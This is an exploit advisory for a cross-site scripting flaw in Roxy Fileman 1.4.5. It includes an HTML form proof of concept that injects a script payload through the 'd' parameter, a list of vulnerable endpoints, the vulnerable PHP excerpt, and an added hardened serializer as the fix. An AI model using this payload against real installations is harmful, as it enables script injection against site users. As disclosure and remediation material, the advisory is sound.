Roxy Fileman Cross Site Scripting

2017.01.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

*=============================================================|
| Exploit Title: Roxy Fileman Cross Site Scripting
| Exploit Author: Ashiyane Digital Security Team
| Vendor Homepage: http://www.roxyfileman.com/
| Download Link: http://www.roxyfileman.com/download.php?f=1.4.5-php
| Version: V 1.4.5
| Platform: PHP
| Tested on: Kali Linux
| Date: 1/12/2017
*=============================================================|
| Exploit Code:
|
| The form below POSTs the directory parameter "d" to fileslist.php with a
| script payload appended to the path; the script echoes the path back into
| its response without HTML-encoding it (see the vulnerable code below).

<HTML>
<HEAD>
 <TITLE>Roxy Fileman Cross Site Scripting</TITLE>
</HEAD>
<BODY>
<!-- "d" is the directory parameter fileslist.php reads from $_POST; the payload
     is entity-encoded here so it is submitted as the field's value instead of
     executing inside this PoC page itself -->
<form action="http://Target/[PATH]/fileman/php/fileslist.php" method="post">
 <input type="hidden" name="d" value="=%252F2%252Ffileman%252FUploads'%22()%26%25&quot;&gt;&lt;script&gt;alert('M.R.S.L.Y')&lt;/script&gt;">
 <input type="submit" value="Send">
</form>
</BODY>
</HTML>

*=======================|
| Vulnerable method: GET & POST
| Files that have this vulnerability:
|
| http://Target/[PATH]/fileman/php/copydir.php
| http://Target/[PATH]/fileman/php/copyfile.php
| http://Target/[PATH]/fileman/php/createdir.php
| http://Target/[PATH]/fileman/php/deletedir.php
| http://Target/[PATH]/fileman/php/renamedir.php
| http://Target/[PATH]/fileman/php/thumb.php
| http://Target/[PATH]/fileman/php/movefile.php
| http://Target/[PATH]/fileman/php/downloaddir.php
| http://Target/[PATH]/fileman/php/dirtree.php
| http://Target/[PATH]/fileman/php/movedir.php
*=======================|
| How to fix this vulnerability:
|
| Filter (validate) all input variables first, then HTML-encode them before
| the script echoes them back. :)
*=======================|
| Vulnerable code, for example (fileslist.php):

<?php
include '../system.inc.php';
include 'functions.inc.php';

verifyAction('FILESLIST');
checkAccess('FILESLIST');

// $_POST['d'] is the user-supplied directory path (the source of the injected payload)
$path = (empty($_POST['d'])? getFilesPath(): $_POST['d']);
$type = (empty($_POST['type'])?'':strtolower($_POST['type']));
if($type != 'image' && $type != 'flash')
  $type = '';
verifyPath($path);

$files = listDirectory(fixPath($path), 0);
natcasesort($files);
$str = '';
echo '[';
foreach ($files as $f){
  $fullPath = $path.'/'.$f;
  if(!is_file(fixPath($fullPath)) || ($type == 'image' && !RoxyFile::IsImage($f)) || ($type == 'flash' && !RoxyFile::IsFlash($f)))
    continue;
  $size = filesize(fixPath($fullPath));
  $time = filemtime(fixPath($fullPath));
  $w = 0;
  $h = 0;
  if(RoxyFile::IsImage($f)){
    $tmp = @getimagesize(fixPath($fullPath));
    if($tmp){
      $w = $tmp[0];
      $h = $tmp[1];
    }
  }
  // sink: only the double quote is escaped, so < > ' & coming from $path reach the response verbatim
  $str .= '{"p":"'.mb_ereg_replace('"', '\"', $fullPath).'","s":"'.$size.'","t":"'.$time.'","w":"'.$w.'","h":"'.$h.'"},';
}
$str = mb_substr($str, 0, -1);
echo $str;
echo ']';
?>

*=============================================================|
| Special Thanks To: Ehsan Cod3r, micle, Und3rgr0und, Amir.ght,
| xenotix, modiret, V For Vendetta, Alireza, r4ouf, Spoofer,
| And All Of My Friends, The Last One: My Self, M.R.S.L.Y
*=============================================================|
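The advisory's fix advice ("filter, then encode before echoing") and the vulnerable fileslist.php excerpt are illustrated below by an added example that is not Roxy Fileman's own code and not part of the original advisory. It places the page's hand-built JSON serializer (only the double quote is backslashed) beside a hardened version that uses json_encode() with the JSON_HEX_* flags and sends the response as application/json with nosniff. The function names serialize_vulnerable, serialize_hardened, path_is_allowed and send_json, the sample file names, and the files root /var/www/fileman/Uploads are all assumptions for this example; the directory check is only modelled on the verifyPath() call in the excerpt, whose body the advisory does not show.

```php
<?php
// Added example, not Roxy Fileman's own code: the serializer from fileslist.php
// beside a hardened replacement. Input values are constructed inline so the
// script runs offline with `php fileslist_hardened.php`.

// Constructed sample input: the "d" parameter from the PoC above as PHP would
// hand it over in $_POST (URL-decoded once), plus two harmless file names.
$path  = '/2/fileman/Uploads"><script>alert(\'M.R.S.L.Y\')</script>';
$files = ['a.png', 'b.jpg'];

// 1. The original approach: JSON is built by string concatenation and only the
//    double quote is backslashed (str_replace() here does what the page's
//    mb_ereg_replace('"', '\"', ...) does). < > ' & reach the response verbatim,
//    so a browser that renders the body as HTML runs the script.
function serialize_vulnerable(string $path, array $files): string
{
    $str = '';
    foreach ($files as $f) {
        $fullPath = $path . '/' . $f;
        $str .= '{"p":"' . str_replace('"', '\\"', $fullPath) . '"},';
    }
    return '[' . substr($str, 0, -1) . ']';
}

// 2. Hardened: build the structure as a PHP array and let json_encode() escape
//    it. The JSON_HEX_* flags turn < > " ' & into \uXXXX escapes, which is
//    still valid JSON for the JavaScript client but inert if the body is ever
//    rendered as HTML.
function serialize_hardened(string $path, array $files): string
{
    $entries = [];
    foreach ($files as $f) {
        $entries[] = ['p' => $path . '/' . $f];
    }
    return json_encode(
        $entries,
        JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_HEX_APOS | JSON_UNESCAPED_SLASHES
    );
}

// Assumed directory check (modelled on the verifyPath() call in the page, whose
// body the advisory does not show): the resolved path must live under the
// configured files root. realpath() returns false for a non-existent directory,
// which is treated as a rejection rather than silently passed through.
function path_is_allowed(string $path, string $filesRoot): bool
{
    $real = realpath($path);
    $root = realpath($filesRoot);
    if ($real === false || $root === false) {
        return false;
    }
    return strpos($real . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) === 0;
}

// The response headers belong with the fix: declare the body as JSON and forbid
// MIME sniffing so the browser never interprets the listing as a document.
function send_json(string $body): void
{
    header('Content-Type: application/json; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo $body;
}

$vulnerable = serialize_vulnerable($path, $files);
$hardened   = serialize_hardened($path, $files);

echo "vulnerable: $vulnerable\n";
echo "hardened:   $hardened\n";
echo 'raw <script> in vulnerable output: ', (strpos($vulnerable, '<script>') !== false) ? 'yes' : 'no', "\n";
echo 'raw <script> in hardened output:   ', (strpos($hardened, '<script>') !== false) ? 'yes' : 'no', "\n";
echo 'PoC path allowed under /var/www/fileman/Uploads (assumed root): ',
     path_is_allowed($path, '/var/www/fileman/Uploads') ? 'yes' : 'no', "\n";
```

In a patched fileslist.php the request handler would reject the request when path_is_allowed() returns false and otherwise call send_json(serialize_hardened($path, $files)); the echo lines at the bottom only exist so the two outputs can be compared side by side from the command line.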


Copyright 2018, cxsecurity.com